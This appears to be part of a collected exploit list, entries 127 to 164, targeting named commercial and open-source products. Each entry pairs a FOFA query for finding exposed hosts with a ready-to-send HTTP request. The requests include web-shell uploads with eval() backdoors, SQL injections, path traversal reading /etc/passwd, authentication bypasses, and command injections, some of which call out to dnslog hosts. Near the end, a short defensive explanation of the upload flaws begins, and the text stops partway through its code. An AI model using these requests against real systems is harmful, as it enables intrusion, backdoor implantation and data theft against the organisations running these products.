Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:10050
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass via template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file returned in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The file is stored under its original name and extension: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

The x\' value is a probe for whether the quote reaches the query unescaped; entry 187 below is the time-based variant of the same CVE.

159. 英飞达 (INFINITT) PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

bufValue is the base64-encoded file body, here a JScript .asmx web service whose Cmdshell method evals its Pass parameter. Then invoke the uploaded service:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal / arbitrary file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The path is sent fully percent-encoded (%2F for / and ..%2F for ../), so a filter that only inspects the raw request line will not see a traversal.

161. 科拓全智能停车收费系统 (smart parking fee system) Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> element sets the file name (it is used as given, ../ included) and <fileFlow> carries the file content, which must be base64-encoded (encoded, not encrypted).
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: the ../ sequences place the file in the web root, so it is reachable at http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 (multimedia information publishing system) QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The remotePath field selects the target directory: http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 (distribution management system) ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
A UEditor-style image upload controller (action=image, upfile field) under /admin/, called here without any session cookie:
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 (smart campus management system) FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The upload is stored as update.aspx (the client's .aspx extension is preserved): http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

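The uploads in entries 157, 159, 161, 162, 163 and 164 share one root cause: the server trusts the client's file name (including any ../ and the extension) and, at most, the part's Content-Type. As an added example (not code from any of these products), the Python below shows the vulnerable join beside a hardened check that rejects traversal, non-allowlisted and double extensions, and content whose magic bytes do not match the extension, then stores the file under a server-chosen name. The upload root and the allowlist are assumptions for the demonstration.

```python
import os
import secrets

# Assumed upload directory for the demonstration; real products use their own
# (entry 157 writes to /userfile/default/userlogo/, entry 164 to /Upload/Publish/...).
UPLOAD_ROOT = "/srv/app/userfile"

# Allowed extension -> magic bytes the content must start with (assumed policy:
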